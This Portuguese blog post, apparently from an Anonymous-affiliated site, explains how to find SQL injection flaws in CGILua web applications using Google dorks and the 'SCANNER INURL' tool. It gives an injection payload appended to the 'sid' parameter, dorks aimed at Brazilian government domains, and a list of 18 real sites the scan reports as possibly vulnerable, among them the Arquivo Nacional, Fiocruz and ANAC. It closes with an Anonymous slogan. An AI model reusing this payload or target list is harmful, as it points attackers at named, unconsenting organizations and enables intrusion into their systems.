Usando SNCANNER INURL para achar falhas em aplicações CGILua

Exploitando CGILua
Usando SNCANNER INURL para achar falhas em aplicações CGILua

O CGILua' é uma ferramenta que permite criar páginas Web dinâmicas e manipular a inserção de dados por meio de formulários Web.
ID de referências para cada página tem um ID específico ("sid") que o quadro utiliza na maioria das URLs.

EXPLOIT USADO: '0x272D2D3B

DORK[1]: CGILua 3.2.1 CGI
Filtrando domínio.
DORK[2]: site:.gov.br intext:"CGILua 3.2.1 CGI"
DORK[3]: inurl:cgi/cgilua.exe/sys/start.htm?sid=1
DORK[4]: inurl:"cgi/cgilua.exe/"


Usando SCANNER INURL para achar possíveis falhas:

TOTAL DE URL's: 75

TOTAL DE POSSÍVEIS VULL: 18

ARQUIVO COM RESULTADO: resultados.txt

LISTA:


http://www.arquivonacional.gov.br/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
www.arquivonacional.gov.br/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.fiocruz.br/chagas/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
www.fiocruz.br/chagas/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.fiocruz.br/chagas_esp/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.fiocruz.br/jovem/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.academia.org.br/abl/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.ecobrasil.org.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.decisionreport.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
www.decisionreport.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.feiradetecnologia.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
www.feiradetecnologia.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.abcmc.org.br/publique3/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.fecomercio-rj.org.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www2.anac.gov.br/portal/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://old.propmark.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.esextante.com.br/publique/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B
http://www.espacosintoniasesc.senac.br/cgi/cgilua.exe/sys/start.htm?sid=1'0x272D2D3B

Scanner INURL:
https://code.google.com/p/scanner-inurl/

Permita nos apresentar como Anonymous, e Anonymous apenas. Nós somos uma idéia. Uma idéia que não pode ser contida, perseguida nem aprisionada.

You Might Also Like

0 comentários